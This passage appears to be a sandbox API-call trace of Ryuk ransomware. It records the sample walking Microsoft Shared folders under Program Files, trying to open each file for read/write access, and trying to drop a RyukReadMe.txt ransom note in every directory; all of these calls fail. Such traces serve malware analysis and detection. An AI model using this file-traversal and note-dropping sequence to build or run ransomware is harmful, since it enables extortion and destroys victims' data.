Shared\\GRPHFLT\\CGMIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.flt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.011] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.011] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.011] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.011] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.012] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT", dwFileAttributes=0x80) returned 0 [0161.012] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.fnt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.012] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.012] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.012] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.012] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.012] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT", dwFileAttributes=0x80) returned 0 [0161.012] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\epsimp32.flt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.012] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.012] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.013] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.013] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.013] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT", dwFileAttributes=0x80) returned 0 [0161.013] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\gifimp32.flt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.013] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.013] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.013] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.013] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.013] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT", dwFileAttributes=0x80) returned 0 [0161.013] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\jpegim32.flt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.014] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.014] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.014] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.014] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.014] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM", dwFileAttributes=0x80) returned 0 [0161.014] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.cgm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.014] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.014] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.015] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.015] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.015] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS", dwFileAttributes=0x80) returned 0 [0161.015] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.eps"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.015] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.015] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.015] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.015] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.015] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF", dwFileAttributes=0x80) returned 0 [0161.015] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.016] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.016] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.016] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.016] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.016] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG", dwFileAttributes=0x80) returned 0 [0161.016] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.016] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.016] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.016] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.016] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.016] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG", dwFileAttributes=0x80) returned 0 [0161.017] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.017] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.017] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.017] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.017] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.017] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG", dwFileAttributes=0x80) returned 0 [0161.017] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.wpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.017] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.017] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.017] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.017] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.018] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT", dwFileAttributes=0x80) returned 0 [0161.018] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\pictim32.flt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.018] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.018] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.018] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.018] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.018] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT", dwFileAttributes=0x80) returned 0 [0161.018] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\png32.flt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.018] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.018] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.019] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.019] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.019] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT", dwFileAttributes=0x80) returned 0 [0161.019] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\wpgimp32.flt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.019] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.019] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.019] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0161.019] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0161.020] SetLastError (dwErrCode=0x0) [0161.020] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.022] GetLastError () returned 0x5 [0161.022] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0161.022] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.023] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0161.023] SetLastError (dwErrCode=0x0) [0161.023] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.023] GetLastError () returned 0x5 [0161.023] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0161.023] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.023] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e80 [0161.023] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.023] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.023] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.023] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.023] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0161.023] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0161.023] SetLastError (dwErrCode=0x0) [0161.023] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.023] GetLastError () returned 0x5 [0161.023] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0161.023] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.023] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0161.023] SetLastError (dwErrCode=0x0) [0161.023] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.024] GetLastError () returned 0x5 [0161.024] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0161.024] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.024] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e80 [0161.024] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.024] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.024] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.024] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", dwFileAttributes=0x80) returned 0 [0161.024] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.024] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.024] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.024] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.024] SetLastError (dwErrCode=0x0) [0161.024] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.025] GetLastError () returned 0x5 [0161.025] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0161.025] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.025] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2ee0 [0161.025] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.025] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.025] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0161.025] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0161.025] SetLastError (dwErrCode=0x0) [0161.025] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ar-sa\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.025] GetLastError () returned 0x5 [0161.025] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0161.025] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.025] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.025] SetLastError (dwErrCode=0x0) [0161.025] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.025] GetLastError () returned 0x5 [0161.026] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0161.026] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.026] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2ee0 [0161.026] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.026] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.026] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0161.026] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0161.026] SetLastError (dwErrCode=0x0) [0161.026] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\bg-bg\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.026] GetLastError () returned 0x5 [0161.026] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0161.026] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.026] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.026] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.026] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml", dwFileAttributes=0x80) returned 0 [0161.026] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.027] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.027] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.027] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.027] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.027] SetLastError (dwErrCode=0x0) [0161.027] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.027] GetLastError () returned 0x5 [0161.027] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0161.027] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.027] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2ee0 [0161.027] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.027] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.027] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0161.027] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0161.027] SetLastError (dwErrCode=0x0) [0161.027] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\cs-cz\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.028] GetLastError () returned 0x5 [0161.028] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0161.028] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.028] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.028] SetLastError (dwErrCode=0x0) [0161.028] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.028] GetLastError () returned 0x5 [0161.028] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0161.028] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.028] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2ee0 [0161.028] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.028] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.028] FindNextFileW (in: hFindFile=0x3a2ee0, 